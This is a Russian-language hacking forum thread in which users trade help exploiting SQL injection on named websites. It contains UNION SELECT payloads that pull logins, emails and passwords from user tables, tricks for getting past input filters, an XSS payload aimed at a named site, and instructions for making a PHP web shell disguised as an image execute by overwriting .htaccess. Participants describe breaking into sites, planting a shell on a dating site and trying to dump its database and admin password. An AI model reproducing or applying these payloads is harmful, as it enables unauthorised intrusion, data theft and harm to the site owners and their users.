-1+union+select+1,unhex(hex(login))+from+User+--+ НЕ показывает

-1+union+select+1,aes_decrypt(aes_encrypt(login))+f rom+User+--+ НЕ показывает

Ни Email, Login, ForumName, FullName не хочет показывать как можно это обойти?

2noviyuser

пробуй захексить

login=0x6c6f67696e

shell_c0de said:
2noviyuser
пробуй захексить
login=0x6c6f67696e


не хочет показывает только login, не подошел

можент надо конвертировать str в int? есть ли такая функция

Code:
On /index.php?name=1%00%27&file=faq&p=3098
While executing query "SELECT mid, title, custom_title, active, view, blocks, version FROM cms_modules WHERE LOWER(title)='1�''"

the following error occured: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1' at line 1

In: /home/anonimka/public_html/index.php on line: 73

Что за ошибка ? можно как-нибудь раскрутить ?

ivitalii said:

Code:
On /index.php?name=1%00%27&file=faq&p=3098
While executing query "SELECT mid, title, custom_title, active, view, blocks, version FROM cms_modules WHERE LOWER(title)='1�''"

the following error occured: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1' at line 1

In: /home/anonimka/public_html/index.php on line: 73

Что за ошибка ? можно как-нибудь раскрутить ?


Ошибка синтаксиса MySQL. По всей видимости, можно.

Как раскрутить, написано здесь /thread43966.html

П.С. Зачем там нуллбайт?

noviyuser said:
Netcat CMS
-1+union+select+1,user_id+from+User+--+ показывает
-1+union+select+1,unhex(hex(password))+from+User+--+ показывает
-1+union+select+1,password+from+User+--+ показывает
-1+union+select+1,login+from+User+--+ НЕ показывает
-1+union+select+1,unhex(hex(login))+from+User+--+ НЕ показывает
-1+union+select+1,aes_decrypt(aes_encrypt(login))+f rom+User+--+ НЕ показывает
Ни Email, Login, ForumName, FullName не хочет показывать как можно это обойти?


+union+select+1,cast(version()+as+binary),3,4,5,6

or

+union+select+1,convert(version()+using+latin1),3, 4,5,6

or

/*!...*/

помогите разобратся, невогу вывести информацию из табле схема, постоянно пишет ошибку

http://nicedave.com/content.php?id=6659+union+select+1,2,3

qaz said:
помогите разобратся, невогу вывести информацию из табле схема, постоянно пишет ошибку
http://nicedave.com/content.php?id=6659+union+select+1,2,3


Доступ к information_schema закрыт.Ручками перебирай таблицы.Там есть таблица "users"

privateurl.com

в поле логин

хз как там раскрутить помогите и вообще кривая какаят +--+ не робит а /* робит чо эт знач помогите

кста через union можно ток select выполнять или апдэйт, delete, insert тож

Так работает:


Code:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--

А так нет:


Code:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuari o,email,password)+from+ph_usuarios--

Почему? =\

DCrypt said:
Так работает:

Code:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--

А так нет:

Code:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuari o,email,password)+from+ph_usuarios--

Почему? =\


Кажется там from фильтруется.

Кажется там from фильтруется.


http://www.exploit-db.com/exploits/16060/

Где?

DCrypt said:
http://www.exploit-db.com/exploits/16060/
Где?


а при чем тут сама уязвимость, фильтруется на хосте, только не from, а select from, обходится так:


Code:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT%0a1,2,3,4,concat_ws(0x3a,codigousua rio,email,password)+from+ph_usuarios--

подскажите софт или скрипт для быстрого блайнда? а то приходится долго ждать пока идет перебор

поломал сайтец пришло время заливать шелл на стандартные вещи типо sheel.php.gif не помогают, помогите как бы! Внизу админки был найден корпарайт -> Copyright © 2006 Content-manager

uname -a: Windows NT WINCTRL-7IBNPUN 6.1 build 7600 ((null)) i586

Safe-mode: ON (secure)

C:\ drwxrwxrwx

(это пхп шелл)

Можно как-то запускать радмин или что-то?

KandidaT'S said:
поломал сайтец пришло время заливать шелл на стандартные вещи типо sheel.php.gif не помогают, помогите как бы! Внизу админки был найден корпарайт -> Copyright © 2006 Content-manager


Нереал так подсказать.

В админке есть залив файлов?


noviyuser said:
подскажите софт или скрипт для быстрого блайнда? а то приходится долго ждать пока идет перебор


Тулза от Пашкелы вроде умеет.

заливка фаилов есть я так понел картинки и pdf заливаю sheel.php.pdf пишет неправильное название

Вопрос простой-заливаю шелл в картинку при помощи Notepad, затем ставлю её в датинге как основное фото(админом не спалилось) .Далее копирую урл картинки и шелл нифига не открывается- почему? Заливаю как shell.php.jpg. Shell.jpg.php не прокатывает. Может какой другой прогой шелл в картинку вливать? Если делать просто шелл без изображения т.е. просто конвертировать название шелла- то вообще не прокатывает.

http://okfreedating.net/static/i/1/10/A8/t_u594088_399_shell.php.jpg либо так http://okfreedating.net/photo.php?user_id=594088&album_id=1&current=0 , а шелл не открывается-(((

И ещё. Зная на взломанном сайте таблицы,номера колонок и т.д.,т.е. полный путь до нужной базы,но опять же без админки, чем сдампить эту базу? Пытался сдампить Havij 1.14, но слишком долго-база миллионник-)

ICQ 620198086

http://admin.okfreedating.net/login.php- админка

профиль где залит шелл: vlamalijj@Fdfnfh

И ещё- как получить пароль админа? Просьба не пинать-) Учусь

Поймите, что когда вы заливаете картинку, она не будет работать сама, ну не будет, понимаете. Нужно ее проинклюдить где-то. Ну или перезаписать .htaccess.

fl00der said:
Поймите, что когда вы заливаете картинку, она не будет работать сама, ну не будет, понимаете. Нужно ее проинклюдить где-то. Ну или перезаписать .htaccess.



Спасибо огромное-) Где прочитать как заинклудить картинку или перезаписать htaccess?

странные ошибки

Можем ли мы получить "table_name" от этой ошибки?

http://www.icedtime.com/search?gender=[men,women,unisex]&price=[0,1000000]&categories=[7700']

SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and 1=2)' at line 1

а в чём проблема? раскручиваешь как обычную скулю, только скобку закрыв перед запросом

Dagger said:
Спасибо огромное-)
Где прочитать как заинклудить картинку или перезаписать htaccess?


Для инклюда нужен бажный скрипт на сайти, надо найти уязвимость типа LFI. О них много рассказано на форуме, примеры есть в теме РНР-инъекции.

Хтаксесс можно перезаписать/записать путем заливки файла с таким именем и добавления чего-то вроде

AddType application/x-httpd-php .gif

fl00der said:
Для инклюда нужен бажный скрипт на сайти, надо найти уязвимость типа LFI. О них много рассказано на форуме, примеры есть в теме РНР-инъекции.
Хтаксесс можно перезаписать/записать путем заливки файла с таким именем и добавления чего-то вроде
AddType application/x-httpd-php .gif



ок. Помог. Хорошо помог-) Это именно то,что я хотел услышать. Респект

при кавычке выдает

Warning: getimagesize(discograf/51\'/say_face_01.jpg): failed to open stream: No such file or directory in /home/vitasco3/public_html/adm/disco/class_disko.php on line 335

пытаюсь подставить логическую операцию выдает тоже самое.

уязвимость ли это и можно ли ее раскрутить?

assinjeans said:
при кавычке выдает
Warning: getimagesize(discograf/51\'/say_face_01.jpg): failed to open stream: No such file or directory in /home/vitasco3/public_html/adm/disco/class_disko.php on line 335
пытаюсь подставить логическую операцию выдает тоже самое.
уязвимость ли это и можно ли ее раскрутить?


Вы бы сперва хоть ознокомились с php, sql а потом что то делали. толку от того что вы суете везде ковычки. перед вами ошибка в которой все описанно. нету там иньекции. единственно что вот xss


Code:
http://www.vitas.com.ru/diskograf.php?id=12%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E%3C%22

что дает эта ошибка, кроме раскрытия путей?

Fatal error: Uncaught exception 'E_NOTICE' with message 'Undefined variable: text_block' in [path]:62 Stack trace: #0 [path](62): PHP_Exceptionizer_Catcher->handler(8, 'Undefined varia...', '[path]', 62, Array) #1 /[path](4): require_once('[path]') #2 {main} thrown in [path] on line 62

Нашол 90 уязвимостей

Уязвимости для sql injecion, нужно скачать весь сайт с базой и скриптами.Подскажите как или за отдельную плату можете это сделать?

Сайт lbss.lv

www.blabla.com/posting.php?mode=post&f='&sid=1d83ba1228e6ef2a1f3e4ea8afc88e88

показывает:

Warning: strtr() [function.strtr]: The second argument is not an array in /home/mastery/blabla.com/includes/session.php on line 2184

Fatal error: template->_tpl_load_file(): File /message_body.html does not exist or is empty in /home/mastery/blabla.com/includes/functions_template.php on line 63

пошарил античат,гугл,хакер ру,начал перебирать +unon+select+1,2,3

www.blabla.com/posting.php?mode=post&f='&sid=-1d83ba1228e6ef2a1f3e4ea8afc88e88+unon+select+1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30

дошел до 30 безрезультатно.показывает все тоже сообшениею.обьясните плиз может что то не так делаю???и как надо делать

novi4ek92 said:
www.blabla.com/posting.php?mode=post&f='&sid=1d83ba1228e6ef2a1f3e4ea8afc88e88
показывает:
Warning: strtr() [function.strtr]: The second argument is not an array in /home/mastery/blabla.com/includes/session.php on line 2184
Fatal error: template->_tpl_load_file(): File /message_body.html does not exist or is empty in /home/mastery/blabla.com/includes/functions_template.php on line 63
пошарил античат,гугл,хакер ру,начал перебирать +unon+select+1,2,3
www.blabla.com/posting.php?mode=post&f='&sid=-1d83ba1228e6ef2a1f3e4ea8afc88e88+unon+select+1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30
дошел до 30 безрезультатно.показывает все тоже сообшениею.обьясните плиз может что то не так делаю???и как надо делать


Это не ошибка БД, тут нет инъекции.

Redwood said:
Это не ошибка БД, тут нет инъекции.


а инклуд здесь можно сделать?

http://3389.ru/servers?sort=199 ПОмогите пожалуйста тут просто ошибка?или тут есть сукль.

Да скуль там походу, только пробелы что-то режет.

CheatCodeX said:
http://3389.ru/servers?sort=199 ПОмогите пожалуйста тут просто ошибка?или тут есть сукль.


Тут НЕТ sql инъекции!

инъекция там в order by но все не алфовитно-цифровые символы обрезаются

Seravin said:
инъекция там в order by но все не алфовитно-цифровые символы обрезаются


Есть идеи по обходу?

Подскажите пожалуйста это PHP-inj?

http://smsa.net.ru/tv/index.php?id=1h